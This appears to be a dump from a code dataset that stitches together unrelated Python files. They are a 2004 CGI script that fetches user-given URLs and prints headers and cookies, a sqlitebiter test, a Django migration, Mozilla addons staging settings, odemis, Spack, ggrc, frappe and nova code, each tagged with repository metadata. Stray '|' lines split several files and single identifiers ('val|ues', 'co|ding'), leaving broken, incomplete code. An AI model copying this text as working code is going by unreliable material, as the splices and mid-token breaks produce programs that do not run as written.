404: ('Not Found', 'Nothing matches the given URI'),
405: ('Method Not Allowed',
'Specified method is invalid for this server.'),
406: ('Not Acceptable', 'URI not available in preferred format.'),
407: ('Proxy Authentication Required', 'You must authenticate with '
'this proxy before proceeding.'),
408: ('Request Time-out', 'Request timed out; try again later.'),
409: ('Conflict', 'Request conflict.'),
410: ('Gone',
'URI no longer exists and has been permanently removed.'),
411: ('Length Required', 'Client must specify Content-Length.'),
412: ('Precondition Failed', 'Precondition in headers is false.'),
413: ('Request Entity Too Large', 'Entity is too large.'),
414: ('Request-URI Too Long', 'URI is too long.'),
415: ('Unsupported Media Type', 'Entity body in unsupported format.'),
416: ('Requested Range Not Satisfiable',
'Cannot satisfy request range.'),
417: ('Expectation Failed',
'Expect condition could not be satisfied.'),
500: ('Internal error', 'Server got itself in trouble'),
501: ('Not Implemented',
'Server does not support this operation'),
502: ('Bad Gateway', 'Invalid responses from another server/proxy.'),
503: ('Service temporarily overloaded',
'The server cannot process the request due to a high load'),
504: ('Gateway timeout',
'The gateway server did not receive a timely response'),
505: ('HTTP Version not supported', 'Cannot fulfill request.')
}
################################################################
# Private functions and variables
SCRIPTNAME = os.environ.get('SCRIPT_NAME', '') # the name of the script
versionstring = '1.1.1 18th August, 2004.'
fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
METHOD = 'GET'
METHOD2 = 'POST'
def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if not theform.has_key(field):
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
val
|
ues = map(lambda x: x.value, theform[field]) # allows for list type values
data[field] = values
return data
errormess = "<H1>An Error Has Occurred</H1><BR><B><PRE>"
theformhead = """<HTML><HEAD><TITLE>http.py - Playing With Headers and Cookies</TITLE></HEAD>
<BODY><CENTER
|
>
<H1>Welcome to http.py - <BR>a Python CGI</H1>
<B><I>By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'''.</CENTER>
<BR>'''
HR = '<BR><BR><HR><BR><BR>'
theform = """This CGI script allows you to specify a URL using the form below.<BR>
It will take a look at the specified URL and print the headers from the server.<BR>
It will also print the cookies which ought to be managed by the ClientCookie module.<BR>
<BR>
<H2>Enter the Location</H2>
<FORM METHOD=\"""" + METHOD + '" action="' + SCRIPTNAME + """\">
<input name=url type=text size=45 value=\"%s\" ><BR>
<input type=submit value="Submit"><BR>
</FORM>
<BR><BR><HR><BR><A href="http://www.voidspace.org.uk/atlantibots/pythonutils.html">Voidspace Pythonutils Page</A>
</BODY>
</HTML>
"""
authmess = """<HTML><HEAD><TITLE>Authentication Required</TITLE></HEAD>
<BODY><CENTER>
<H1>Authentication Required</H1>
<B><I>http.py By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'''.</CENTER><BR>
<BR>Please enter your username and password below.<BR>
<FORM METHOD=\"''' + METHOD2 + '" action="' + SCRIPTNAME + """\">Username :
<input name="name" type=text><BR>Password :
<input name="pass" type=password><BR>
<input type=hidden value="%s" name="theurl">
<input type=submit value="Submit">
<BR><BR>
"""
err_mess = """<HTML><HEAD><TITLE>%s</TITLE></HEAD>
<BODY><CENTER>
<H1>%s</H1>
<H2>%s</H2>
</CENTER>"""
################################################################
# main body of the script
if __name__ == '__main__':
print "Content-type: text/html" # this is the header to the server
print # so is this blank line
form = cgi.FieldStorage()
data = getform(['url', 'name', 'pass', 'theurl'], form)
print theformhead
theurl = data['theurl'] or data['url']
if not SCRIPTNAME: theurl = 'http://www.google.com/search?hl=en&ie=UTF-8&q=hello&btnG=Google+Search'
info = 'An error occured before we got the headers.'
e = ''
if not theurl:
print theform % ''
else:
if theurl.find(':') == -1: theurl = 'http://' + theurl
try:
req = reqfun(theurl, None, {'User-agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'})
if data['name'] and data['pass']:
import base64
base64string = base64.encodestring('%s:%s' % (data['name'], data['pass']))[:-1]
req.add_header("Authorization", "Basic %s" % base64string)
u = openfun(req)
info = u.info()
except Exception, e: # an error in fetching the page
if not hasattr(e, 'code'): # Means the page doesn't exist
the_err = errorlist[404]
print err_mess % (the_err[0], the_err[0], the_err[1])
elif e.code == 401: # authentication
pr
|
thombashi/sqlitebiter
|
test/test_version_subcommand.py
|
Python
|
mit
| 373
| 0
|
from click.testing import
|
CliRunner
from sqlitebiter.__main__ import cmd
from sqlitebiter._const import ExitCode
from .common import print_traceback
class Test_version_subcommand:
def test_smoke(self):
runner = CliRunner()
result = runner.invoke(cmd, ["version"])
print_traceback(result)
assert result.exit_code == ExitCode.SUCCE
|
SS
|
F483/trainlessmagazine.com
|
article/migrations/0020_remove_article_issue.py
|
Python
|
mit
| 366
| 0
|
# -*- co
|
ding: utf-8 -*-
from __future__ import unicode_literals
f
|
rom django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('article', '0019_remove_article_ordering_featured'),
]
operations = [
migrations.RemoveField(
model_name='article',
name='issue',
),
]
|
Prashant-Surya/addons-server
|
src/olympia/conf/stage/settings.py
|
Python
|
bsd-3-clause
| 8,094
| 0
|
import logging
import os
import environ
import datetime
from olympia.lib.settings_base import * # noqa
environ.Env.read_env(env_file='/etc/olympia/settings.env')
env = environ.Env()
CDN_HOST = 'https://addons-stage-cdn.allizom.org'
CSP_FONT_SRC += (CDN_HOST,)
CSP_FRAME_SRC += ('https://www.sandbox.paypal.com',)
CSP_IMG_SRC += (CDN_HOST,)
CSP_SCRIPT_SRC += (
# Fix for discovery pane when using services subdomain.
'https://addons.allizom.org',
CDN_HOST,
)
CSP_STYLE_SRC += (CDN_HOST,)
ENGAGE_ROBOTS = False
EMAIL_URL = env.email_url('EMAIL_URL')
EMAIL_HOST = EMAIL_URL['EMAIL_HOST']
EMAIL_PORT = EMAIL_URL['EMAIL_PORT']
EMAIL_BACKEND = EMAIL_URL['EMAIL_BACKEND']
EMAIL_HOST_USER = EMAIL_URL['EMAIL_HOST_USER']
EMAIL_HOST_PASSWORD = EMAIL_URL['EMAIL_HOST_PASSWORD']
EMAIL_QA_WHITELIST = env.list('EMAIL_QA_WHITELIST')
ENV = env('ENV')
DEBUG = False
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
CRONJOB_LOCK_PREFIX = DOMAIN
API_THROTTLE = False
REDIRECT_SECRET_KEY = env('REDIRECT_SECRET_KEY')
DOMAIN = env('DOMAIN', default='addons.allizom.org')
SERVER_EMAIL = 'zstage@addons.mozilla.org'
SITE_URL = 'https://' + DOMAIN
SERVICES_URL = env('SERVICES_URL',
default='https://services.addons.allizom.org')
STATIC_URL = '%s/static/' % CDN_HOST
MEDIA_URL = '%s/user-media/' % CDN_HOST
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
SYSLOG_TAG = "http_app_addons_stage"
SYSLOG_TAG2 = "http_app_addons_stage_timer"
SYSLOG_CSP = "http_app_addons_stage_csp"
DATABASES = {}
DATABASES['default'] = env.db('DATABASES_DEFAULT_URL')
DATABASES['default']['ENGINE'] = 'django.db.backends.mysql'
# Run all views in a transaction (on master) unless they are decorated not to.
DATABASES['default']['ATOMIC_REQUESTS'] = True
# Pool our database connections up for 300 seconds
DATABASES['default']['CONN_MAX_AGE'] = 300
DATABASES['slave'] = env.db('DATABASES_SLAVE_URL')
# Do not open a transaction for every view o
|
n the slave DB.
DATABASES['slave']['ATOMIC_REQUESTS'] = False
DATABASES['slave']['ENGINE'] = 'django.db.backends.mysql'
# Pool our database connections up for 300 s
|
econds
DATABASES['slave']['CONN_MAX_AGE'] = 300
SERVICES_DATABASE = env.db('SERVICES_DATABASE_URL')
SLAVE_DATABASES = ['slave']
CACHE_PREFIX = 'olympia.%s' % ENV
KEY_PREFIX = CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES = {}
CACHES['default'] = env.cache('CACHES_DEFAULT')
CACHES['default']['TIMEOUT'] = 500
CACHES['default']['BACKEND'] = 'caching.backends.memcached.MemcachedCache'
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
SECRET_KEY = env('SECRET_KEY')
LOG_LEVEL = logging.DEBUG
# Celery
BROKER_URL = env('BROKER_URL')
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_RESULT_BACKEND = env('CELERY_RESULT_BACKEND')
NETAPP_STORAGE_ROOT = env(u'NETAPP_STORAGE_ROOT')
NETAPP_STORAGE = NETAPP_STORAGE_ROOT + u'/shared_storage'
GUARDED_ADDONS_PATH = NETAPP_STORAGE_ROOT + u'/guarded-addons'
MEDIA_ROOT = NETAPP_STORAGE + u'/uploads'
# Must be forced in settings because name => path can't be dyncamically
# computed: reviewer_attachmentS VS reviewer_attachment.
# TODO: rename folder on file system.
# (One can also just rename the setting, but this will not be consistent
# with the naming scheme.)
REVIEWER_ATTACHMENTS_PATH = MEDIA_ROOT + '/reviewer_attachment'
LOGGING['loggers'].update({
'z.task': {'level': logging.DEBUG},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
# This is used for `django-cache-machine`
REDIS_BACKEND = env('REDIS_BACKENDS_CACHE')
REDIS_BACKENDS = {
'cache': get_redis_settings(env('REDIS_BACKENDS_CACHE')),
'cache_slave': get_redis_settings(env('REDIS_BACKENDS_CACHE_SLAVE')),
'master': get_redis_settings(env('REDIS_BACKENDS_MASTER')),
'slave': get_redis_settings(env('REDIS_BACKENDS_SLAVE'))
}
CACHE_MACHINE_USE_REDIS = True
# Old recaptcha V1
RECAPTCHA_PUBLIC_KEY = env('RECAPTCHA_PUBLIC_KEY')
RECAPTCHA_PRIVATE_KEY = env('RECAPTCHA_PRIVATE_KEY')
# New Recaptcha V2
NOBOT_RECAPTCHA_PUBLIC_KEY = env('NOBOT_RECAPTCHA_PUBLIC_KEY')
NOBOT_RECAPTCHA_PRIVATE_KEY = env('NOBOT_RECAPTCHA_PRIVATE_KEY')
TMP_PATH = os.path.join(NETAPP_STORAGE, u'tmp')
PACKAGER_PATH = os.path.join(TMP_PATH, 'packager')
ADDONS_PATH = NETAPP_STORAGE_ROOT + u'/files'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = env('RESPONSYS_ID')
ES_TIMEOUT = 60
ES_HOSTS = env('ES_HOSTS')
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_%s' % (v, ENV)) for k, v in ES_INDEXES.items())
STATSD_HOST = env('STATSD_HOST')
STATSD_PREFIX = env('STATSD_PREFIX')
GRAPHITE_HOST = env('GRAPHITE_HOST')
GRAPHITE_PREFIX = env('GRAPHITE_PREFIX')
CEF_PRODUCT = STATSD_PREFIX
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.stage.mozaws.net/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
ADDONS_LINTER_BIN = 'addons-linter'
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = env.dict('GOOGLE_ANALYTICS_CREDENTIALS')
GOOGLE_ANALYTICS_CREDENTIALS['user_agent'] = None
GOOGLE_ANALYTICS_CREDENTIALS['token_expiry'] = datetime.datetime(2013, 1, 3, 1, 20, 16, 45465) # noqa
GOOGLE_API_CREDENTIALS = env('GOOGLE_API_CREDENTIALS')
GEOIP_URL = 'https://geo.services.mozilla.com'
AES_KEYS = env.dict('AES_KEYS')
PERSONA_DEFAULT_PAGES = 5
# Signing
SIGNING_SERVER = env('SIGNING_SERVER')
PRELIMINARY_SIGNING_SERVER = env('PRELIMINARY_SIGNING_SERVER')
# sandbox
PAYPAL_PAY_URL = 'https://svcs.sandbox.paypal.com/AdaptivePayments/'
PAYPAL_FLOW_URL = (
'https://www.sandbox.paypal.com/webapps/adaptivepayment/flow/pay')
PAYPAL_API_URL = 'https://api-3t.sandbox.paypal.com/nvp'
PAYPAL_EMAIL = env('PAYPAL_EMAIL')
PAYPAL_APP_ID = env('PAYPAL_APP_ID')
PAYPAL_PERMISSIONS_URL = 'https://svcs.sandbox.paypal.com/Permissions/'
PAYPAL_CGI_URL = 'https://www.sandbox.paypal.com/cgi-bin/webscr'
PAYPAL_EMBEDDED_AUTH = {
'USER': env('PAYPAL_EMBEDDED_AUTH_USER'),
'PASSWORD': env('PAYPAL_EMBEDDED_AUTH_PASSWORD'),
'SIGNATURE': env('PAYPAL_EMBEDDED_AUTH_SIGNATURE'),
}
PAYPAL_CGI_AUTH = {
'USER': env('PAYPAL_CGI_AUTH_USER'),
'PASSWORD': env('PAYPAL_CGI_AUTH_PASSWORD'),
'SIGNATURE': env('PAYPAL_CGI_AUTH_SIGNATURE'),
}
PAYPAL_CHAINS = (
(30, env('PAYPAL_CHAINS_EMAIL')),
)
SENTRY_DSN = env('SENTRY_DSN')
AMO_LANGUAGES = AMO_LANGUAGES + ('dbg',)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
GOOGLE_ANALYTICS_DOMAIN = 'addons.mozilla.org'
NEWRELIC_ENABLE = env.bool('NEWRELIC_ENABLE', default=False)
if NEWRELIC_ENABLE:
NEWRELIC_INI = '/etc/newrelic.d/%s.ini' % DOMAIN
FXA_CONFIG = {
'default': {
'client_id': env('FXA_CLIENT_ID'),
'client_secret': env('FXA_CLIENT_SECRET'),
'content_host': 'https://accounts.firefox.com',
'oauth_host': 'https://oauth.accounts.firefox.com/v1',
'profile_host': 'https://profile.accounts.firefox.com/v1',
'redirect_url':
'https://addons.allizom.org/api/v3/accounts/authorize/',
'scope': 'profile',
},
'internal': {
'client_id': env('INTERNAL_FXA_CLIENT_ID'),
'client_secret': env('INTERNAL_FXA_CLIENT_SECRET'),
'content_host': 'https://accounts.firefox.com',
'oauth_host': 'https://oauth.accounts.firefox.com/v1',
'profile_host': 'https://profile.accounts.firefox.com/v1',
'redirect_url':
'https://addons.allizom.org/api/v3/accounts/authorize/',
'scope': 'profile',
},
}
INTERNAL_DOMAINS = ['addons-admin.stage.mozaws.net']
for regex, overrides in CORS_ENDPOINT_OVERRIDES:
overrides['CORS_ORIGIN_WHITELIST'] = INTERNAL_DOMAINS
READ_ONLY = env.bool('READ_ONLY', default=False)
RAVEN_DSN = (
'https://e35602be5252460d97587478bcc642df@sentry.prod.mozaws.net/77')
RAVEN_WHITELIST = ['addons.allizom.org', 'addons-cdn.allizom.org']
|
gstiebler/odemis
|
src/odemis/acq/align/test/find_overlay_test.py
|
Python
|
gpl-2.0
| 3,688
| 0.003526
|
# -*- coding: utf-8 -*-
'''
Created on 19 Dec 2013
@author: Kimon Tsitsikas
Copyright © 2012-2013 Kimon Tsitsikas, Delmic
This file is part of Odemis.
Odemis is free software: you can redistribute it and/or modify it under the terms
of the GNU General Public License version 2 as published by the Free Software
Foundation.
Odemis is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Odemis. If not, see http://www.gnu.org/licenses/.
'''
from concurrent import futures
import logging
from odemis import model
import odemis
from odemis.acq import align
from odemis.util import test
import os
import time
import unittest
# logging.basicConfig(format=" - %(levelname)s \t%(message)s")
logging.getLogger().setLevel(logging.DEBUG)
# _frm = "%(asctime)s %(levelname)-7s %(module)-15s: %(message)s"
# logging.getLogger().handlers[0].setFormatter(logging.Formatter(_frm))
CONFIG_PATH = os.path.dirname(odemis.__file__) + "/../../install/linux/usr/share/odemis/"
SECOM_LENS_CONFIG = CONFIG_PATH + "sim/secom-sim-lens-align.odm.yaml" # 4x4
class TestOverlay(unittest.TestCase):
"""
Test Overlay functions
"""
backend_was_running = False
@classmethod
def setUpClass(cls):
try:
test.start_backend(SECOM_LENS_CONFIG)
except LookupError:
logging.info("A running backend is already found, skipping tests")
cls.backend_was_running = True
return
except IOError as exp:
logging.error(str(exp))
raise
# find components by their role
cls.ebeam = model.getComponent(role="e-beam")
cls.sed = model.getComponent(role="se-detector")
cls.ccd = model.getComponent(role="ccd")
cls.light = model.getComponent(role="light")
cls.light_filter = model.getComponent(role="filter")
@classmethod
def tearDownClass(cls):
if cls.backend_was_running:
return
test.stop_backend()
def setUp(self):
if self.backend_was_running:
self.skipTest("Running backend found")
# @unittest.skip("skip")
def test_find_overlay(self):
"""
Test FindOverlay
"""
f = align.FindOverlay((4, 4), 0.1, 10e-06, self.ebeam, self.ccd, self.sed, skew=True)
t, (opt_md, sem_md) = f.result()
self.assertEqual(len(t), 5)
self.assertIn(model.MD_PIXEL_SIZE_COR, opt_md)
self.assertIn(model.MD_SHEAR_COR, sem_md)
# @unittest.skip("skip")
def test_find_overlay_failure(self):
"""
|
Test FindOverlay failure due to low maximum allowed difference
"""
f = align.FindOverlay((6, 6), 1e-6, 1e-08, self.ebeam, self.ccd, self.sed, skew=True)
with self.assertRaises(ValueError):
f.result()
# @unittest.skip("skip")
def test_find_overlay_cancelled(self):
"""
Test FindOverlay cancellation
"""
|
f = align.FindOverlay((6, 6), 10e-06, 1e-07, self.ebeam, self.ccd, self.sed, skew=True)
time.sleep(0.04) # Cancel almost after the half grid is scanned
f.cancel()
self.assertTrue(f.cancelled())
self.assertTrue(f.done())
with self.assertRaises(futures.CancelledError):
f.result()
if __name__ == '__main__':
unittest.main()
# suite = unittest.TestLoader().loadTestsFromTestCase(TestOverlay)
# unittest.TextTestRunner(verbosity=2).run(suite)
|
rspavel/spack
|
var/spack/repos/builtin/packages/py-colorpy/package.py
|
Python
|
lgpl-2.1
| 902
| 0.002217
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyColorpy(PythonPackage):
"""ColorPy is a Python package to convert physical descriptions of light -
spectra of light intensity vs. wavelength - into RGB colors that can be
drawn on a comput
|
er screen. It provides a nice set of attractive plots
that you can make of such spectra, and some other color related
functions as well.
"""
homepage = "http://markkness.net/colorpy/ColorPy.html"
url = "https://pypi.io/packages/source/c/colorpy/colorpy-0.1.1.tar.gz"
version('0.1.1', sha256='e400a7e879adc83c6098dde13cdd093723f3936778c245b1caf88f5f1411170d')
depends_on('py-numpy', type='run')
depends_on('py-mat
|
plotlib', type='run')
|
j0gurt/ggrc-core
|
src/ggrc/models/clause.py
|
Python
|
apache-2.0
| 1,804
| 0.006652
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Module for Clause model."""
from ggrc import db
from ggrc.models.mixins import CustomAttributable
from ggrc.models.deferred import deferred
|
from ggrc.models.mixins import Described
from ggrc.models.mixins import Hierarchical
from ggrc.models.mixins import Hyperlinked
from ggrc.models.m
|
ixins import Noted
from ggrc.models.mixins import Slugged
from ggrc.models.mixins import Stateful
from ggrc.models.mixins import Timeboxed
from ggrc.models.mixins import Titled
from ggrc.models.mixins import WithContact
from ggrc.models.object_owner import Ownable
from ggrc.models.object_person import Personable
from ggrc.models.relationship import Relatable
from ggrc.models.track_object_state import HasObjectState
from ggrc.models.track_object_state import track_state_for_class
class Clause(HasObjectState, Hierarchical, Noted, Described, Hyperlinked,
WithContact, Titled, Stateful, CustomAttributable,
Personable, Ownable, Timeboxed, Relatable, Slugged, db.Model):
VALID_STATES = [
'Draft',
'Final',
'Effective',
'Ineffective',
'Launched',
'Not Launched',
'In Scope',
'Not in Scope',
'Deprecated',
]
__tablename__ = 'clauses'
_table_plural = 'clauses'
_title_uniqueness = True
_aliases = {
"url": "Clause URL",
"description": "Text of Clause",
"directive": None,
}
# pylint: disable=invalid-name
na = deferred(db.Column(db.Boolean, default=False, nullable=False),
'Clause')
notes = deferred(db.Column(db.Text), 'Clause')
_publish_attrs = [
'na',
'notes',
]
_sanitize_html = ['notes']
_include_links = []
track_state_for_class(Clause)
|
paurosello/frappe
|
frappe/modules/utils.py
|
Python
|
mit
| 7,994
| 0.026395
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
"""
Utilities for using modules
"""
import frappe, os, json
import frappe.utils
from frappe import _
def export_module_json(doc, is_standard, module):
"""Make a folder for the given doc and add its json file (make it a standard
object that will be synced)"""
if (not frappe.flags.in_import and getattr(frappe.get_conf(),'developer_mode', 0)
and is_standard):
from frappe.modules.export_file import export_to_files
# json
export_to_files(record_list=[[doc.doctype, doc.name]], record_module=module,
create_init=is_standard)
path = os.path.join(frappe.get_module_path(module), scrub(doc.doctype),
scrub(doc.name), scrub(doc.name))
return path
def get_doc_module(module, doctype, name):
"""Get custom module for given document"""
module_name = "{app}.{module}.{doctype}.{name}.{name}".format(
app = frappe.local.module_app[scrub(module)],
doctype = scrub(doctype),
module = scrub(module),
name = scrub(name)
)
return frappe.get_module(module_name)
@frappe.whitelist()
def export_customizations(module, doctype, sync_on_migrate=0, with_permissions=0):
"""Export Custom Field and Property Setter for the current document to the app folder.
This will be synced with bench migrate"""
if not frappe.get_conf().developer_mode:
raise Exception('Not developer mode')
custom = {'custom_fields': [], 'property_setters': [], 'custom_perms': [],
'doctype': doctype, 'sync_on_migrate': 1}
def add(_doctype):
custom['custom_fields'] += frappe.get_all('Custom Field',
fields='*', filters={'dt': _doctype})
custom['property_setters'] += frappe.get_all('Property Setter',
fields='*', filters={'doc_type': _doctype})
add(doctype)
if with_permissions:
custom['custom_perms'] = frappe.get_all('Custom DocPerm',
fields='*', filters={'parent': doctype})
# also update the custom fields and property setters for all child tables
for d in frappe.get_meta(doctype).get_table_fields():
export_customizations(module, d.options, sync_on_migrate, with_permissions)
if custom["custom_fields"] or custom["property_setters"] or custom["custom_perms"]:
folder_path = os.path.join(get_module_path(module), 'custom')
if not os.path.exists(folder_path):
os.makedirs(folder_path)
path = os.path.join(folder_path, scrub(doctype)+ '.json')
with open(path, 'w') as f:
f.write(frappe.as_json(custom))
frappe.msgprint(_('Customizations for <b>{0}</b> exported to:<br>{1}').format(doctype,path))
def sync_customizations(app=None):
'''Sync custom fields and property setters from custom folder in each app module'''
if app:
apps = [app]
else:
apps = frappe.get_installed_apps()
for app_name in apps:
for module_name in frappe.local.app_modules.get(app_name) or []:
folder = frappe.get_app_path(app_name, module_name, 'custom')
if os.path.exists(folder):
for fname in os.listdir(folder):
with open(os.path.join(folder, fname), 'r') as f:
data = json.loads(f.read())
if data.get('sync_on_migrate'):
sync_customizations_for_doctype(data, folder)
def sync_customizations_for_doctype(data, folder):
'''Sync doctype customzations for a particular data set'''
from frappe.core.doctype.doctype.doctype import validate_fields_for_doctype
doctype = data['doctype']
update_schema = False
def sync(key, custom_doctype, doctype_fieldname):
doctypes = list(set(map(lambda ro
|
w: row.get(doctype_fieldname), data[key])))
# sync single doctype exculding the
|
child doctype
def sync_single_doctype(doc_type):
frappe.db.sql('delete from `tab{0}` where `{1}` =%s'.format(
custom_doctype, doctype_fieldname), doc_type)
for d in data[key]:
if d.get(doctype_fieldname) == doc_type:
d['doctype'] = custom_doctype
doc = frappe.get_doc(d)
doc.db_insert()
for doc_type in doctypes:
# only sync the parent doctype and child doctype if there isn't any other child table json file
if doc_type == doctype or not os.path.exists(os.path.join(folder, frappe.scrub(doc_type)+".json")):
sync_single_doctype(doc_type)
if data['custom_fields']:
sync('custom_fields', 'Custom Field', 'dt')
update_schema = True
if data['property_setters']:
sync('property_setters', 'Property Setter', 'doc_type')
if data.get('custom_perms'):
sync('custom_perms', 'Custom DocPerm', 'parent')
print('Updating customizations for {0}'.format(doctype))
validate_fields_for_doctype(doctype)
if update_schema and not frappe.db.get_value('DocType', doctype, 'issingle'):
from frappe.model.db_schema import updatedb
updatedb(doctype)
def scrub(txt):
return frappe.scrub(txt)
def scrub_dt_dn(dt, dn):
"""Returns in lowercase and code friendly names of doctype and name for certain types"""
return scrub(dt), scrub(dn)
def get_module_path(module):
"""Returns path of the given module"""
return frappe.get_module_path(module)
def get_doc_path(module, doctype, name):
dt, dn = scrub_dt_dn(doctype, name)
return os.path.join(get_module_path(module), dt, dn)
def reload_doc(module, dt=None, dn=None, force=False, reset_permissions=False):
from frappe.modules.import_file import import_files
return import_files(module, dt, dn, force=force, reset_permissions=reset_permissions)
def export_doc(doctype, name, module=None):
"""Write a doc to standard path."""
from frappe.modules.export_file import write_document_file
print(doctype, name)
if not module: module = frappe.db.get_value('DocType', name, 'module')
write_document_file(frappe.get_doc(doctype, name), module)
def get_doctype_module(doctype):
"""Returns **Module Def** name of given doctype."""
def make_modules_dict():
return dict(frappe.db.sql("select name, module from tabDocType"))
return frappe.cache().get_value("doctype_modules", make_modules_dict)[doctype]
doctype_python_modules = {}
def load_doctype_module(doctype, module=None, prefix="", suffix=""):
"""Returns the module object for given doctype."""
if not module:
module = get_doctype_module(doctype)
app = get_module_app(module)
key = (app, doctype, prefix, suffix)
module_name = get_module_name(doctype, module, prefix, suffix)
try:
if key not in doctype_python_modules:
doctype_python_modules[key] = frappe.get_module(module_name)
except ImportError as e:
raise ImportError('Module import failed for {0} ({1})'.format(doctype, module_name + ' Error: ' + str(e)))
return doctype_python_modules[key]
def get_module_name(doctype, module, prefix="", suffix="", app=None):
return '{app}.{module}.doctype.{doctype}.{prefix}{doctype}{suffix}'.format(\
app = scrub(app or get_module_app(module)),
module = scrub(module),
doctype = scrub(doctype),
prefix=prefix,
suffix=suffix)
def get_module_app(module):
return frappe.local.module_app[scrub(module)]
def get_app_publisher(module):
app = frappe.local.module_app[scrub(module)]
if not app:
frappe.throw(_("App not found"))
app_publisher = frappe.get_hooks(hook="app_publisher", app_name=app)[0]
return app_publisher
def make_boilerplate(template, doc, opts=None):
target_path = get_doc_path(doc.module, doc.doctype, doc.name)
template_name = template.replace("controller", scrub(doc.name))
if template_name.endswith('._py'):
template_name = template_name[:-4] + '.py'
target_file_path = os.path.join(target_path, template_name)
if not doc: doc = {}
app_publisher = get_app_publisher(doc.module)
if not os.path.exists(target_file_path):
if not opts:
opts = {}
with open(target_file_path, 'w') as target:
with open(os.path.join(get_module_path("core"), "doctype", scrub(doc.doctype),
"boilerplate", template), 'r') as source:
target.write(frappe.utils.encode(
frappe.utils.cstr(source.read()).format(
app_publisher=app_publisher,
year=frappe.utils.nowdate()[:4],
classname=doc.name.replace(" ", ""),
doctype=doc.name, **opts)
))
|
devendermishrajio/nova_test_latest
|
nova/tests/unit/objects/test_block_device.py
|
Python
|
apache-2.0
| 16,751
| 0.00006
|
# Copyright 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from nova.cells import rpcapi as cells_rpcapi
from nova import context
from nova import db
from nova import exception
from nova import objects
from nova.objects import block_device as block_device_obj
from nova import test
from nova.tests.unit import fake_block_device
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_objects
class _TestBlockDeviceMappingObject(object):
def fake_bdm(self, instance=None):
instance = instance or {}
fake_bdm = fake_block_device.FakeDbBlockDeviceDict({
'id': 123,
'instance_uuid': instance.get('uuid') or 'fake-instance',
'device_name': '/dev/sda2',
'source_type': 'snapshot',
'destination_type': 'volume',
|
'connection_info': "{'fake': 'connection_info'}",
'snapshot_id': 'fake-snapshot-id-1',
'boot_index': -1
})
if instance:
fake_bdm['ins
|
tance'] = instance
return fake_bdm
def _test_save(self, cell_type=None):
if cell_type:
self.flags(enable=True, cell_type=cell_type, group='cells')
else:
self.flags(enable=False, group='cells')
fake_bdm = self.fake_bdm()
with test.nested(
mock.patch.object(
db, 'block_device_mapping_update', return_value=fake_bdm),
mock.patch.object(
cells_rpcapi.CellsAPI, 'bdm_update_or_create_at_top')
) as (bdm_update_mock, cells_update_mock):
bdm_object = objects.BlockDeviceMapping(context=self.context)
bdm_object.id = 123
bdm_object.volume_id = 'fake_volume_id'
bdm_object.save()
bdm_update_mock.assert_called_once_with(
self.context, 123, {'volume_id': 'fake_volume_id'},
legacy=False)
if cell_type != 'compute':
self.assertFalse(cells_update_mock.called)
else:
self.assertEqual(1, cells_update_mock.call_count)
self.assertTrue(len(cells_update_mock.call_args[0]) > 1)
self.assertIsInstance(cells_update_mock.call_args[0][1],
block_device_obj.BlockDeviceMapping)
self.assertEqual(cells_update_mock.call_args[1], {})
def test_save_nocells(self):
self._test_save()
def test_save_apicell(self):
self._test_save(cell_type='api')
def test_save_computecell(self):
self._test_save(cell_type='compute')
def test_save_instance_changed(self):
bdm_object = objects.BlockDeviceMapping(context=self.context)
bdm_object.instance = objects.Instance()
self.assertRaises(exception.ObjectActionError,
bdm_object.save)
@mock.patch.object(db, 'block_device_mapping_update', return_value=None)
def test_save_not_found(self, bdm_update):
bdm_object = objects.BlockDeviceMapping(context=self.context)
bdm_object.id = 123
